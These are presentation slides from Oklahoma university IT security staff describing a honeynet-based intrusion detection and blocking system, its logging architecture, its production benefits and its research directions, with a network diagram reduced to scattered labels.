Advanced Attack Detection andInfrastructure Protection

Sean Ensz –OU IT Security Analyst

Sallie Wright –OSU IT Security Officer

Dr. Mark Weiser –OSU Director of CTANS

Agenda

• Technical Overview – Sean Ensz

• Production Benefits – Sallie Wright

• Research Benefits – Dr. Mark Weiser

Technical Overview

• Core system based on a Honeynet design– A Honeynet is a network of honeypots– A honeypot is an information system resource

whose value lies in illicit use of that resource– A honeypot has no legitimate users– Any traffic going to and from the system in

inherently suspicious

*Source: www.honeynet.org

Vmware ESX

EdgeIron 24GConsole

FOUNDRYNETWORKS

1

2

3

4

5

6

7

8

9

10

11

12

13

14

15

16

17

18

19

20

21

22

23

24

Power

Diag

RPU

21 22 23 24 1 3 5 7 9 11 13 15 17 19 21 23

2 4 6 8 10 12 14 16 18 20 22 24

Link/Act

FDX

Link/Act

FDX

Local DB Switch

VLAN Trunk

Management VLAN Trunk

Honeypot

Honeypot

Honeypot Honeypot

Honeypot

Honeypot

Honeywall Layer 2 Bridge

Log Generators

Log Subsystems

Log Collectors

Actions

Network Traffic Network TrafficNet Switch Honeywall Hosts

Snort IPTables pcap Evt Logs Sebek HIDSFlow Data

MySQL

Local DB

-Rebuild Honeypot-Assign Initial Severity-Export

Export

Export TablesMySQL

Central DB

-Increase Severity-Add to Null Route Table

Store

Future Improvements

• Honeywall– Needs better hardware & network driver support– Beta version to be released today

• Host based logging– Currently relies on Sebek – Lacks host log and process tree support– Working with Third Brigade to develop a honeypot

version of their product

Production Benefits

No real securityProgram

WIDE OPEN

IT Security Office

Policy FocusCentral Anti-virus

IDS

Border FirewallIT Security PlanLaBrea Tarpit

Anti-SpamIntrusion Prevention

SystemAIPS

2000

2001-2002

2003-2004

2005

OSU IT Systems SecurityEvolution

AIPS Production Benefits

•Identification of malicious hosts

•Ability to block at the border of Oklahoma’s OneNet state-wide network

Collaboration

•A key benefit is the ability to provide academic programs with tools to research

•Develop new ways to strengthen overall IT security.

Production Goal

•To contain and prevent intrusions while providing the data

•Flow analysis to tune the IT security process.

Research Benefits

• How This May Be Extended – Future Research – Related Endeavors

Day Zero Signature

ExistingSignatures

CandidateDetects

HN DesignAttacks

HN WildAttacks

Day ZeroSignature

AI/Neural Nets

Other Methods

Validation

MiddleWare

Honeynet“Solution”

Platform-neutralSolution (file) Middleware

Router D

escription /A

ccess Information

Router/Firewall

Basic Near-Real-Time Activity Detector

• Low-cost log gathering w/ local analysis

• Central Cumulative Analysis

• Trigger points distribute alerts to subscribers

Sean Ensz

ensz@ou.edu

Sallie Wright

sallie.wright@okstate.edu

Dr. Mark Weiser

weiser@okstate.edu